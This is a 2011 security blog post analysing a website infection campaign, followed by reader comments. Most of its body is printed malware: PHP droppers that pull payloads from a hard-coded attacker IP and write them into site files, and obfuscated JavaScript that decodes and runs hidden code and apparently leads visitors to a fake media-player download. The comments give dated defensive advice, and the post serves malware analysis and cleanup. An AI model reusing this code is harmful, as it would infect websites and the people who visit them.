Saturday 16 April 2011

js.php/counter.js/confdb.php/facebook.php infection

Similar to the Lizamoon's attack, i've noticed many sites with injected code at the top of files (index.php/config.php) a simple script injection like this:

<script type="text/javascript" src="http://omegasystems.eu/counter.php"></script>
<script type="text/javascript" src="http://domain-marktplatz.info/counter.php"></script>
<script type="text/javascript" src="http://neroli.com.pl/js.php"></script>
<script type="text/javascript" src="http://psa.krakow.pl/js.php"></script>
<script type="text/javascript" src="http://osiedleprzyparku.miechowianka.krakow.pl/js.php"></script>
<script type="text/javascript" src="http://designtattooideas.com/js.php"></script>
<script type="text/javascript" src="http://igarakh.tmweb.ru/js.php"></script>
<script type="text/javascript" src="http://alqreenxp.com/js.php"></script>
<script type="text/javascript" src="http://marketingnorg.nl/js.php"></script>
<script type="text/javascript" src="http://cef.co.pt/js.php"></script>
<script type="text/javascript" src="http://dreaklandmt2.com/js.php"></script>
<script type="text/javascript" src="http://sem-elektrik.com/counter.js"></script>
<script type="text/javascript" src="http://araby-world.com/counter.js"></script>
<script type="text/javascript" src="http://r-komfortstyle.ru/counter.js"></script>

js.php:
<?php

// ----------------------------------------------------------------------
// touch this!  ---------------------------------------------------------

define( 'CACHE_DEBUG',              false );
define( 'CACHE_TIME_SECONDS',       600 );
define( 'CACHE_UPDATE_URL',         "http://193.105.240.93/data/config.txt" );

// ----------------------------------------------------------------------
// dont touch this! -----------------------------------------------------

define( 'CACHE_MARKER_START',       "<?p"."hp /* <CA"."CHE>" );
define( 'CACHE_MARKER_END',         "</CA"."CHE> */ ?".">" );

// ----------------------------------------------------------------------

$cache_code     = null;
$cache_file     = __FILE__;
$cached_time    = time() - filemtime($cache_file);

// ----------------------------------------------------------------------

if (CACHE_DEBUG) echo "Cached time is {$cached_time} seconds, update planned after ".(CACHE_TIME_SECONDS - $cached_time)." seconds\n";


// ----------------------------------------------------------------------
// check cached time

if($cached_time > CACHE_TIME_SECONDS)
{
    // get new cache code
    $cache_code = file_get_contents(CACHE_UPDATE_URL);
    if(!empty($cache_code))
    {
        if (CACHE_DEBUG) echo "Update cache...\n";
        write_cache($cache_file, $cache_code);
    }
    else
    {
        if (CACHE_DEBUG) echo "Can't get cache data!\n";
    }
}
else
{
        if(CACHE_DEBUG) echo "Read cache code...\n";

        // extract cached data
        $cache_code = extract_cache($cache_file);
        if(empty($cache_code))
        {
            if (CACHE_DEBUG) echo "Cache empty! Update cache...\n";
            $cache_code = file_get_contents(CACHE_UPDATE_URL);
            if(!empty($cache_code))
            {
                // write cache
                write_cache($cache_file, $cache_code);
            }
            else
            {
                if (CACHE_DEBUG) echo "Can't get cache data!\n";
            }
        }
}

// ----------------------------------------------------------------------

header("Content-Type: text/plain; charset=windows-1251");
echo $cache_code;

// ----------------------------------------------------------------------

exit;

// ----------------------------------------------------------------------
/// read file data

function file_get_contents_locked($file_path)
{
    $fp = fopen($file_path, "r");
    if($fp !== FALSE)
    {
        flock($fp, LOCK_EX);
        $data = fread($fp, filesize($file_path));
        flock($fp, LOCK_UN);
        fclose($fp);

        return $data;
    }

    return FALSE;
}

// ----------------------------------------------------------------------
/// extract cache from file by cache markers

function extract_cache($file_path)
{
    $data = file_get_contents_locked($file_path);
    if(strpos($data, CACHE_MARKER_START) !== FALSE)
    {
        $cache_start_pos = strpos($data, CACHE_MARKER_START) + strlen(CACHE_MARKER_START);
        $cache_end_pos = strpos($data, CACHE_MARKER_END);

        $cache = substr($data, $cache_start_pos, $cache_end_pos - $cache_start_pos);

        if(!empty($cache))
            return base64_decode($cache);
    }

    return null;
}

// ----------------------------------------------------------------------
// write cache to file

function write_cache($file_path, $cache_data)
{
    if(!is_writable($file_path))
    {
        if (CACHE_DEBUG) echo "Cache file not writable!\n";
        return null;
    }

    $data = file_get_contents_locked($file_path);
    if($data !== FALSE && !empty($data))
    {
        // delete old cache
        if(strpos($data, CACHE_MARKER_START) !== FALSE)
        {
            $cache_start_pos = strpos($data, CACHE_MARKER_START);

            $data = substr($data, 0, $cache_start_pos);
            $data = rtrim($data);
        }

        // restore close tags
        if(substr($data, -2, 2) !== '?>')
            $data.="?>";

        $data.= CACHE_MARKER_START .base64_encode($cache_data). CACHE_MARKER_END;

        $fp=fopen($file_path, "w+");
        flock($fp, LOCK_EX);
        fwrite($fp, $data);
        flock($fp, LOCK_UN);
        fclose($fp);
    }
}?><?php /* <CACHE>dmFyIGRhdGU9bmV3IERhdGUoKTtmdW5jdGlvbiBsb2xzKCl7cmV0dXJuIHRydWV9CndpbmRvdy5vbmVycm9yPWxvbHM7ZnVuY3Rpb24gZ2V0WG1sSHR0cCgpe3ZhciB4bWxodHRwO3RyeXt4bWxodHRwPW5ldyBBY3RpdmVYT2JqZWN0KCdNc3htbDIuWE1MSFRUUCcpO31jYXRjaChlKXt0cnl7eG1saHR0cD1uZXcgQWN0aXZlWE9iamVjdCgnTWljcm9zb2Z0LlhNTEhUVFAnKTt9Y2F0Y2goZSl7eG1saHR0cD1mYWxzZTt9fQppZigheG1saHR0cCYmdHlwZW9mIFhNTEh0dHBSZXF1ZXN0IT0ndW5kZWZpbmVkJyl7eG1saHR0cD1uZXcgWE1MSHR0cFJlcXVlc3QoKTt9CnJldHVybiB4bWxodHRwO30Kdj0xNjtkYXRlPW5ldyBEYXRlKCk7dHJ5e3ZhciByZXE9Z2V0WG1sSHR0cCgpO3JlcS5vbnJlYWR5c3RhdGVjaGFuZ2U9ZnVuY3Rpb24oKXtpZihyZXEucmVhZHlTdGF0ZT09MSl7YWJzcmJ3YSgpO319O3JlcS5vcGVuKCdHRVQnLCdodHRwOi8vZ29vZ2xlLmNvbS8nLHRydWUpO3JlcS5zZW5kKG51bGwpO31jYXRjaChlKXt9CnZhciB5PWZhbHNlO2Z1bmN0aW9uIGFic3Jid2EoKXtpZih5KXJldHVybjt5PXRydWU7dmFyIGs9dHlwZW9mIHRoaXMudGl0bGU7ZXY9ZXZhbDt2YXIgY29udD1ldigndTE0NCwwLjU2MjUsMTY4MCw2LjM3NSw1MTIsMi41LDE2MDAsNi45Mzc1LDE1ODQsNy4zMTI1LDE3NDQsNi4zMTI1LDE3NjAsNy4yNSw3MzYsNi40Mzc1LDE2MTYsNy4yNSwxMTA0LDYuNzUsMTYxNiw2LjgxMjUsMTYxNiw2Ljg3NSwxODU2LDcuMTg3NSwxMDU2LDcuNTYyNSwxMzQ0LDYuMDYyNSwxNjQ4LDQuODc1LDE1NTIsNi44MTI1LDE2MTYsMi41LDYyNCw2LjEyNSwxNzc2LDYuMjUsMTkzNiwyLjQzNzUsNjU2LDUuNjg3NSw3NjgsNS44MTI1LDY1Niw3LjY4NzUsMjA4LDAuNTYyNSwxNDQsMC41NjI1LDE2ODAsNi4zNzUsMTgyNCw2LjA2MjUsMTc0NCw2LjMxMjUsMTgyNCwyLjUsNjU2LDMuNjg3NSwyMDgsMC41NjI1LDE0NCw3LjgxMjUsNTEyLDYuMzEyNSwxNzI4LDcuMTg3NSwxNjE2LDIsMTk2OCwwLjgxMjUsMTQ0LDAuNTYyNSwxNDQsNi4yNSwxNzc2LDYuMTg3NSwxODcyLDYuODEyNSwxNjE2LDYuODc1LDE4NTYsMi44NzUsMTkwNCw3LjEyNSwxNjgwLDcuMjUsMTYxNiwyLjUsNTQ0LDMuNzUsMTY4MCw2LjM3NSwxODI0LDYuMDYyNSwxNzQ0LDYuMzEyNSw1MTIsNy4xODc1LDE4MjQsNi4xODc1LDk3NiwyLjQzNzUsMTY2NCw3LjI1LDE4NTYsNyw5MjgsMi45Mzc1LDc1Miw2LjE4NzUsMTcyOCw2LjkzNzUsMTg1Niw2LjUsMTYxNiw3LjE4NzUsNzM2LDMuMTI1LDE3MTIsMy4wNjI1LDc4NCwzLjU2MjUsNzM2LDYuMTg3NSwxNzc2LDYuODEyNSw3NTIsNi44NzUsMTYxNiw3LjQzNzUsMTg0MCwyLjkzNzUsODAwLDMsNzg0LDMsNjI0LDIsMTkwNCw2LjU2MjUsMTYwMCw3LjI1LDE2NjQsMy44MTI1LDYyNCwzLjA2MjUsNzY4LDIuNDM3NSw1MTIsNi41LDE2MTYsNi41NjI1LDE2NDgsNi41LDE4NTYsMy44MTI1LDYyNCwzLjA2MjUsNzY4LDIuNDM3NSw1MTIsNy4xODc1LDE4NTYsNy41NjI1LDE3MjgsNi4zMTI1LDk3NiwyLjQzNzUsMTg4OCw2LjU2MjUsMTg0MCw2LjU2MjUsMTU2OCw2LjU2MjUsMTcyOCw2LjU2MjUsMTg1Niw3LjU2MjUsOTI4LDYuNSwxNjgwLDYuMjUsMTYwMCw2LjMxMjUsMTc2MCwzLjY4NzUsMTc5Miw2LjkzNzUsMTg0MCw2LjU2MjUsMTg1Niw2LjU2MjUsMTc3Niw2Ljg3NSw5MjgsNi4wNjI1LDE1NjgsNy4xODc1LDE3NzYsNi43NSwxODcyLDcuMjUsMTYxNiwzLjY4NzUsMTcyOCw2LjMxMjUsMTYzMiw3LjI1LDkyOCwzLDk0NCw3LjI1LDE3NzYsNyw5MjgsMyw5NDQsMi40Mzc1LDk5MiwzLjc1LDc1Miw2LjU2MjUsMTYzMiw3LjEyNSwxNTUyLDYuODEyNSwxNjE2LDMuODc1LDU0NCwyLjU2MjUsOTQ0LDAuODEyNSwxNDQsMC41NjI1LDIwMDAsMC44MTI1LDE0NCwwLjU2MjUsMTYzMiw3LjMxMjUsMTc2MCw2LjE4NzUsMTg1Niw2LjU2MjUsMTc3Niw2Ljg3NSw1MTIsNi41NjI1LDE2MzIsNy4xMjUsMTU1Miw2LjgxMjUsMTYxNiw3LjEyNSw2NDAsMi41NjI1LDE5NjgsMC44MTI1LDE0NCwwLjU2MjUsMTQ0LDcuMzc1LDE1NTIsNy4xMjUsNTEyLDYuMzc1LDUxMiwzLjgxMjUsNTEyLDYuMjUsMTc3Niw2LjE4NzUsMTg3Miw2LjgxMjUsMTYxNiw2Ljg3NSwxODU2LDIuODc1LDE1ODQsNy4xMjUsMTYxNiw2LjA2MjUsMTg1Niw2LjMxMjUsMTEwNCw2Ljc1LDE2MTYsNi44MTI1LDE2MTYsNi44NzUsMTg1NiwyLjUsNjI0LDYuNTYyNSwxNjMyLDcuMTI1LDE1NTIsNi44MTI1LDE2MTYsMi40Mzc1LDY1NiwzLjY4NzUsMTYzMiwyLjg3NSwxODQwLDYuMzEyNSwxODU2LDQuMDYyNSwxODU2LDcuMjUsMTgyNCw2LjU2MjUsMTU2OCw3LjMxMjUsMTg1Niw2LjMxMjUsNjQwLDIuNDM3NSwxODQwLDcuMTI1LDE1ODQsMi40Mzc1LDcwNCwyLjQzNzUsMTY2NCw3LjI1LDE4NTYsNyw5MjgsMi45Mzc1LDc1Miw2LjE4NzUsMTcyOCw2LjkzNzUsMTg1Niw2LjUsMTYxNiw3LjE4NzUsNzM2LDMuMTI1LDE3MTIsMy4wNjI1LDc4NCwzLjU2MjUsNzM2LDYuMTg3NSwxNzc2LDYuODEyNSw3NTIsNi44NzUsMTYxNiw3LjQzNzUsMTg0MCwyLjkzNzUsODAwLDMsNzg0LDMsNjI0LDIuNTYyNSw5NDQsNi4zNzUsNzM2LDcuMTg3NSwxODU2LDcuNTYyNSwxNzI4LDYuMzEyNSw3MzYsNy4zNzUsMTY4MCw3LjE4NzUsMTY4MCw2LjEyNSwxNjgwLDYuNzUsMTY4MCw3LjI1LDE5MzYsMy44MTI1LDYyNCw2LjUsMTY4MCw2LjI1LDE2MDAsNi4zMTI1LDE3NjAsMi40Mzc1LDk0NCw2LjM3NSw3MzYsNy4xODc1LDE4NTYsNy41NjI1LDE3MjgsNi4zMTI1LDczNiw3LDE3NzYsNy4xODc1LDE2ODAsNy4yNSwxNjgwLDYuOTM3NSwxNzYwLDMuODEyNSw2MjQsNi4wNjI1LDE1NjgsNy4xODc1LDE3NzYsNi43NSwxODcyLDcuMjUsMTYxNiwyLjQzNzUsOTQ0LDYuMzc1LDczNiw3LjE4NzUsMTg1Niw3LjU2MjUsMTcyOCw2LjMxMjUsNzM2LDYuNzUsMTYxNiw2LjM3NSwxODU2LDMuODEyNSw2MjQsMyw2MjQsMy42ODc1LDE2MzIsMi44NzUsMTg0MCw3LjI1LDE5MzYsNi43NSwxNjE2LDIuODc1LDE4NTYsNi45Mzc1LDE3OTIsMy44MTI1LDYyNCwzLDYyNCwzLjY4NzUsMTYzMiwyLjg3NSwxODQwLDYuMzEyNSwxODU2LDQuMDYyNSwxODU2LDcuMjUsMTgyNCw2LjU2MjUsMTU2OCw3LjMxMjUsMTg1Niw2LjMxMjUsNjQwLDIuNDM3NSwxOTA0LDYuNTYyNSwxNjAwLDcuMjUsMTY2NCwyLjQzNzUsNzA0LDIuNDM3NSw3ODQsMyw2MjQsMi41NjI1LDk0NCw2LjM3NSw3MzYsNy4xODc1LDE2MTYsNy4yNSwxMDQwLDcuMjUsMTg1Niw3LjEyNSwxNjgwLDYuMTI1LDE4NzIsNy4yNSwxNjE2LDIuNSw2MjQsNi41LDE2MTYsNi41NjI1LDE2NDgsNi41LDE4NTYsMi40Mzc1LDcwNCwyLjQzNzUsNzg0LDMsNjI0LDIuNTYyNSw5NDQsMC44MTI1LDE0NCwwLjU2MjUsMTQ0LDYuMjUsMTc3Niw2LjE4NzUsMTg3Miw2LjgxMjUsMTYxNiw2Ljg3NSwxODU2LDIuODc1LDE2NDgsNi4zMTI1LDE4NTYsNC4zMTI1LDE3MjgsNi4zMTI1LDE3NDQsNi4zMTI1LDE3NjAsNy4yNSwxODQwLDQuMTI1LDE5MzYsNS4yNSwxNTUyLDYuNDM3NSwxMjQ4LDYuMDYyNSwxNzQ0LDYuMzEyNSw2NDAsMi40Mzc1LDE1NjgsNi45Mzc1LDE2MDAsNy41NjI1LDYyNCwyLjU2MjUsMTQ1NiwzLDE0ODgsMi44NzUsMTU1Miw3LDE3OTIsNi4zMTI1LDE3NjAsNi4yNSwxMDcyLDYuNSwxNjgwLDYuNzUsMTYwMCwyLjUsMTYzMiwyLjU2MjUsOTQ0LDAuODEyNSwxNDQsMC41NjI1LDIwMDBdJy5yZXBsYWNlKGsuc3Vic3RyKDAsMSksJ1snKSk7cz0nJztmb3IoaT0wO2k8Y29udC5sZW5ndGg7aSsrKXtzKz1TdHJpbmcuZnJvbUNoYXJDb2RlKChpJTIpP2NvbnRbaV0qdjpjb250W2ldL3YpO30KZXYocyk7fQ==</CACHE> */ ?>

config.txt:
var date=new Date();function lols(){return true}

window.onerror=lols;function getXmlHttp(){var xmlhttp;try{xmlhttp=new ActiveXObject('Msxml2.XMLHTTP');}catch(e){try{xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');}catch(e){xmlhttp=false;}}

if(!xmlhttp&&typeof XMLHttpRequest!='undefined'){xmlhttp=new XMLHttpRequest();}

return xmlhttp;}

v=16;date=new Date();try{var req=getXmlHttp();req.onreadystatechange=function(){if(req.readyState==1){absrbwa();}};req.open('GET','http://google.com/',true);req.send(null);}catch(e){}

var y=false;function absrbwa(){if(y)return;y=true;var k=typeof this.title;ev=eval;var cont=ev('u144,0.5625,1680,6.375,512,2.5,1600,6.9375,1584,7.3125,1744,6.3125,1760,7.25,736,6.4375,1616,7.25,1104,6.75,1616,6.8125,1616,6.875,1856,7.1875,1056,7.5625,1344,6.0625,1648,4.875,1552,6.8125,1616,2.5,624,6.125,1776,6.25,1936,2.4375,656,5.6875,768,5.8125,656,7.6875,208,0.5625,144,0.5625,1680,6.375,1824,6.0625,1744,6.3125,1824,2.5,656,3.6875,208,0.5625,144,7.8125,512,6.3125,1728,7.1875,1616,2,1968,0.8125,144,0.5625,144,6.25,1776,6.1875,1872,6.8125,1616,6.875,1856,2.875,1904,7.125,1680,7.25,1616,2.5,544,3.75,1680,6.375,1824,6.0625,1744,6.3125,512,7.1875,1824,6.1875,976,2.4375,1664,7.25,1856,7,928,2.9375,752,6.1875,1728,6.9375,1856,6.5,1616,7.1875,736,3.125,1712,3.0625,784,3.5625,736,6.1875,1776,6.8125,752,6.875,1616,7.4375,1840,2.9375,800,3,784,3,624,2,1904,6.5625,1600,7.25,1664,3.8125,624,3.0625,768,2.4375,512,6.5,1616,6.5625,1648,6.5,1856,3.8125,624,3.0625,768,2.4375,512,7.1875,1856,7.5625,1728,6.3125,976,2.4375,1888,6.5625,1840,6.5625,1568,6.5625,1728,6.5625,1856,7.5625,928,6.5,1680,6.25,1600,6.3125,1760,3.6875,1792,6.9375,1840,6.5625,1856,6.5625,1776,6.875,928,6.0625,1568,7.1875,1776,6.75,1872,7.25,1616,3.6875,1728,6.3125,1632,7.25,928,3,944,7.25,1776,7,928,3,944,2.4375,992,3.75,752,6.5625,1632,7.125,1552,6.8125,1616,3.875,544,2.5625,944,0.8125,144,0.5625,2000,0.8125,144,0.5625,1632,7.3125,1760,6.1875,1856,6.5625,1776,6.875,512,6.5625,1632,7.125,1552,6.8125,1616,7.125,640,2.5625,1968,0.8125,144,0.5625,144,7.375,1552,7.125,512,6.375,512,3.8125,512,6.25,1776,6.1875,1872,6.8125,1616,6.875,1856,2.875,1584,7.125,1616,6.0625,1856,6.3125,1104,6.75,1616,6.8125,1616,6.875,1856,2.5,624,6.5625,1632,7.125,1552,6.8125,1616,2.4375,656,3.6875,1632,2.875,1840,6.3125,1856,4.0625,1856,7.25,1824,6.5625,1568,7.3125,1856,6.3125,640,2.4375,1840,7.125,1584,2.4375,704,2.4375,1664,7.25,1856,7,928,2.9375,752,6.1875,1728,6.9375,1856,6.5,1616,7.1875,736,3.125,1712,3.0625,784,3.5625,736,6.1875,1776,6.8125,752,6.875,1616,7.4375,1840,2.9375,800,3,784,3,624,2.5625,944,6.375,736,7.1875,1856,7.5625,1728,6.3125,736,7.375,1680,7.1875,1680,6.125,1680,6.75,1680,7.25,1936,3.8125,624,6.5,1680,6.25,1600,6.3125,1760,2.4375,944,6.375,736,7.1875,1856,7.5625,1728,6.3125,736,7,1776,7.1875,1680,7.25,1680,6.9375,1760,3.8125,624,6.0625,1568,7.1875,1776,6.75,1872,7.25,1616,2.4375,944,6.375,736,7.1875,1856,7.5625,1728,6.3125,736,6.75,1616,6.375,1856,3.8125,624,3,624,3.6875,1632,2.875,1840,7.25,1936,6.75,1616,2.875,1856,6.9375,1792,3.8125,624,3,624,3.6875,1632,2.875,1840,6.3125,1856,4.0625,1856,7.25,1824,6.5625,1568,7.3125,1856,6.3125,640,2.4375,1904,6.5625,1600,7.25,1664,2.4375,704,2.4375,784,3,624,2.5625,944,6.375,736,7.1875,1616,7.25,1040,7.25,1856,7.125,1680,6.125,1872,7.25,1616,2.5,624,6.5,1616,6.5625,1648,6.5,1856,2.4375,704,2.4375,784,3,624,2.5625,944,0.8125,144,0.5625,144,6.25,1776,6.1875,1872,6.8125,1616,6.875,1856,2.875,1648,6.3125,1856,4.3125,1728,6.3125,1744,6.3125,1760,7.25,1840,4.125,1936,5.25,1552,6.4375,1248,6.0625,1744,6.3125,640,2.4375,1568,6.9375,1600,7.5625,624,2.5625,1456,3,1488,2.875,1552,7,1792,6.3125,1760,6.25,1072,6.5,1680,6.75,1600,2.5,1632,2.5625,944,0.8125,144,0.5625,2000]'.replace(k.substr(0,1),'['));s='';for(i=0;i<cont.length;i++){s+=String.fromCharCode((i%2)?cont[i]*v:cont[i]/v);}

ev(s);}

Thanks to an infected webmaster who gave me the file, you know who you are ;)

That even try to inject php: (here on a 'index.html' page)

counter.js:
date=new Date();var ar=",B:.};C0mb]gE=\"iuo{ n1/Avty'l<cepwdT()[rxsf h>aNk";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f57,0,-12,81,3,-21,-6,-51,39,-42,-24,69,-33,15,-66,24,60,-18,-39,48,9,-69,69,-33,15,48,-120,75,27,33,-105,108,-3,-114,69,15,-27,-54,24,51,-24,3,30,3,-93,9,81,-57,3,0,0,-12,81,-9,21,-114,69,24,-9,3,-96,42,0,-45,117,-36,-9,39,-30,36,-75,3,0,0,45,-51,39,-42,-24,69,-33,15,-66,90,18,-72,30,18,15,-66,45,-42,81,-9,21,-114,69,36,-6,-6,-27,-51,42,51,-57,0,21,-90,60,0,33,-48,66,27,-135,75,-36,72,-72,69,-39,6,-33,33,0,-39,48,30,-114,81,-39,-27,42,-21,-21,114,-105,60,30,-57,27,-33,15,42,-39,3,48,-30,-54,57,-27,57,-93,42,-18,-42,60,48,3,-39,-48,-12,99,-57,-36,42,-18,-42,60,48,-6,-48,3,6,9,-54,42,-9,-27,78,-78,-18,18,39,-39,30,3,-72,126,-87,57,0,-9,-33,-45,81,-45,72,-78,30,-30,6,9,-54,132,-111,96,-72,33,-36,27,18,-78,69,9,33,-51,-69,15,-6,60,-24,45,-90,15,-6,66,54,-48,-21,-21,81,-9,21,-114,69,42,-93,69,-96,42,0,-45,45,0,69,-78,12,30,-15,-30,6,9,69,-84,81,-9,21,-114,69,24,-9,3,-57,3,0,0,15,66,-21,12,-3,3,-90,90,-27,-51,39,-42,-24,69,-33,15,-66,81,27,-24,45,-63,18,-57,48,9,-69,69,-33,15,33,-27,-36,81,-9,21,-114,69,-12,30,-96,111,-117,114,-30,-18,-6,6,0,42,-72,-18,21,27,18,15,-27,42,-6,-27,-9,-81,81,51,-57,0,21,-90,60,0,33,-48,66,27,-135,75,-36,72,-72,69,-39,6,-33,33,0,-39,48,30,-114,81,-39,-27,42,-21,-21,114,-105,60,30,-57,27,-33,15,42,-39,3,30,-96,111,-117,114,-48,3,6,9,-84,63,-27,78,-78,-18,18,39,-39,30,3,-39,42,51,-87,57,0,-9,-33,21,-66,111,-117,114,-48,3,6,9,-84,87,-45,72,-78,30,-30,6,9,-21,42,57,-111,96,-72,33,-36,27,18,-12,-66,111,-117,114,-48,3,6,9,-84,75,9,33,-51,-36,42,-60,60,-66,111,-117,114,-48,3,6,9,-84,66,-24,45,-57,42,-60,60,-66,111,-117,114,-30,-18,-6,6,0,42,-72,-18,21,27,18,15,-27,18,-54,57,-27,57,-51,-81,81,-18,-42,60,30,-96,111,-117,114,-30,-18,-6,6,0,42,-72,-18,21,27,18,15,-27,51,-39,-48,-12,99,-57,6,-81,81,-18,-42,60,30,-96,42,0,0,45,-51,39,-42,-24,69,-33,15,-66,24,60,-18,-39,48,9,-69,69,-33,15,48,-120,75,27,33,-105,108,-3,-114,69,15,-27,-54,24,51,-24,3,30,3,-93,9,-21,129,-42,0,-3,-33,42,-84,114,-87,39,18,6,18,-15,-96,42,0,-45]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}
e(s);

confdb.php:
<?php

// ----------------------------------------------------------------------
// touch this!  ---------------------------------------------------------

define( 'CACHE_DEBUG',              false );
define( 'CACHE_TIME_SECONDS',       0 );
define( 'CACHE_UPDATE_URL',         "http://193.105.240.93/data/all.txt" );
define( 'CACHE_FILE',               "counter.js" );

// ----------------------------------------------------------------------

$cache_code     = null;
$cache_file     = CACHE_FILE;
$cached_time    = time() - (file_exists($cache_file) ? filemtime($cache_file) : 0);

// ----------------------------------------------------------------------

if (CACHE_DEBUG) echo "Cached time is {$cached_time} seconds, update planned after ".(CACHE_TIME_SECONDS - $cached_time)." seconds\n";

// ----------------------------------------------------------------------
// check cached time

if($cached_time > CACHE_TIME_SECONDS)
{
    // get new cache code
    $cache_code = file_get_contents(CACHE_UPDATE_URL);
    if(!empty($cache_code))
    {
        if (CACHE_DEBUG) echo "Update cache...\n";
        write_cache($cache_file, $cache_code);
    }
    else
    {
        if (CACHE_DEBUG) echo "Can't get cache data!\n";
    }
}

else
{
        if(CACHE_DEBUG) echo "Read cache code...\n";

        // extract cached data

        $cache_code = extract_cache($cache_file);
        if(empty($cache_code))
        {
            if (CACHE_DEBUG) echo "Cache empty! Update cache...\n";
            $cache_code = file_get_contents(CACHE_UPDATE_URL);
            if(!empty($cache_code))
            {
                // write cache
                write_cache($cache_file, $cache_code);
            }
            else
            {
                if (CACHE_DEBUG) echo "Can't get cache data!\n";
            }
        }
}

// ----------------------------------------------------------------------

header("Content-Type: text/plain; charset=windows-1251");
echo $cache_code;

// ----------------------------------------------------------------------

exit;

// ----------------------------------------------------------------------
/// read file data

function file_get_contents_locked($file_path)
{
    $fp = fopen($file_path, "r");
    if($fp !== FALSE)
    {
        flock($fp, LOCK_EX);
        $data = fread($fp, filesize($file_path));
        flock($fp, LOCK_UN);
        fclose($fp);

        return $data;
    }
    return FALSE;
}

// ----------------------------------------------------------------------
/// extract cache from file by cache markers

function extract_cache($file_path)
{
    if(file_exists($file_path))
        return file_get_contents_locked($file_path);

    return null;
}

// ----------------------------------------------------------------------
// write cache to file

function write_cache($file_path, $cache_data)
{
    if(file_exists($file_path) && !is_writable($file_path))
    {
        if (CACHE_DEBUG) echo "Cache file not writable!\n";
        return null;
    }

    $fp=fopen($file_path, "w+");
    flock($fp, LOCK_EX);
    fwrite($fp, $cache_data);
    flock($fp, LOCK_UN);
    fclose($fp);
}

The IP 193.105.240.93, actually lead to fake VLC Media Player download





Tagged as malware on the site 'VirusTotal' and detected by 30 Antivirus: http://www.virustotal.com/file-scan/report.html?id=c4e354e38ffff9a201f1d78cedc61bdbe2fcb454834a93d41c792eb6709b0c17-1305710785

4 comments:

  1. Hi... my sites have been attacked with this code.. how can i fix this??

    ReplyDelete
  2. Hi Hector,
    You need to secure your sql query when you call the database.
    These infection come from a bot who crawl internet and search for potential sql injection vulnerabilities.
    In PHP you can use mysql_real_escape_string()
    if you want an example:

    $id = mysql_real_escape_string($_GET['id']);
    $response = mysql_query('SELECT users FROM website WHERE id =\'' .$id. '\'');

    after i recommend you to check your whole code for php backdoors or others vulnerabilities (include, LFI, upload, etc..)
    And if nothing check if the Safe Mode of your server is off (not secure) or activated.

    It's a simple injection sql but when you are infected... you should review and check all your code.
    prevention is better than cure ;)

    ReplyDelete
  3. I've been hit by the bot as well and I'm wondering if blocking the IP will work.?

    This seems to be fairly common because a friend of mine got hit as well and we're in 2 different countries and on totally different servers.

    Sucks to have to edit all of the index pages and remove the "virus" all the time

    ReplyDelete
  4. Hi Vince, i don't think IP blocking (193.105.240.93) will be a solution.
    It's a server IP not the bot IP, or if your server logs each ip who make a file modification ?
    I guess that can be a solution but temporary..
    like i've says to Hector, secure your code and change your database password, that the best way.

    .htaccess ~
    order allow,deny
    deny from 193.105.240.93
    allow from all

    ReplyDelete